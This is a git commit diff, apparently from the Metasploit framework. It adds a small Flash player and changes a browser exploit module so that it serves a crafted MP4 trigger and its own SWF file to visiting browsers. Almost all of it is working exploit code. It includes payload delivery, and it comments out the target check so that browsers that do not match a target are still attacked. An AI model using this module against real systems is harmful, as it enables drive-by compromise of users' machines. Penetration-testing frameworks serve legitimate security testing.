Merge branch 'mp4-player'
commit
0c70586625
|
@ -0,0 +1,22 @@
|
||||||
|
function randText(newLength:Number):String{
|
||||||
|
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||||
|
var alphabet:Array = a.split("");
|
||||||
|
var randomLetter:String = "";
|
||||||
|
for (var i:Number = 0; i < newLength; i++){
|
||||||
|
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
|
||||||
|
}
|
||||||
|
return randomLetter;
|
||||||
|
}
|
||||||
|
|
||||||
|
var connect_nc:NetConnection = new NetConnection();
|
||||||
|
connect_nc.connect(null);
|
||||||
|
|
||||||
|
var stream_ns:NetStream = new NetStream(connect_nc);
|
||||||
|
stream_ns.onStatus = function(p_evt:Object):Void { }
|
||||||
|
|
||||||
|
|
||||||
|
video.attachVideo(stream_ns);
|
||||||
|
|
||||||
|
stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");
|
||||||
|
|
||||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
|
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||||
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
|
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -94,19 +93,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||||
if my_target.nil?
|
if my_target.nil?
|
||||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
||||||
send_not_found(cli)
|
#send_not_found(cli)
|
||||||
return
|
#return
|
||||||
|
my_target = targets[1]
|
||||||
end
|
end
|
||||||
|
|
||||||
# The SWF requests our MP4 trigger
|
# The SWF requests our MP4 trigger
|
||||||
if request.uri =~ /\.mp4$/
|
if request.uri =~ /\.mp4$/
|
||||||
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
|
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
|
||||||
#print_error("Sorry, not sending you the mp4 for now")
|
|
||||||
#send_not_found(cli)
|
|
||||||
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
|
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# The SWF request itself
|
||||||
|
if request.uri =~ /\.swf$/
|
||||||
|
print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
|
||||||
|
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# Redirect to a trailing slash so relative paths work properly
|
||||||
|
if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
|
||||||
|
uri = resource_uri + "/"
|
||||||
|
send_redirect(cli, uri)
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
# Set payload depending on target
|
# Set payload depending on target
|
||||||
p = payload.encoded
|
p = payload.encoded
|
||||||
|
|
||||||
|
@ -140,8 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
|
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
|
||||||
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
|
swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
|
||||||
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
|
|
||||||
|
|
||||||
html = %Q|
|
html = %Q|
|
||||||
<html>
|
<html>
|
||||||
|
@ -166,8 +177,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
@mp4 = create_mp4
|
@mp4 = create_mp4
|
||||||
|
@swf = create_swf
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def create_swf
|
||||||
|
path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
|
||||||
|
fd = ::File.open( path, "rb" )
|
||||||
|
swf = fd.read(fd.stat.size)
|
||||||
|
fd.close
|
||||||
|
return swf
|
||||||
|
end
|
||||||
|
|
||||||
def create_mp4
|
def create_mp4
|
||||||
ftypAtom = "\x00\x00\x00\x20" #Size
|
ftypAtom = "\x00\x00\x00\x20" #Size
|
||||||
|
|
Loading…
Reference in New Issue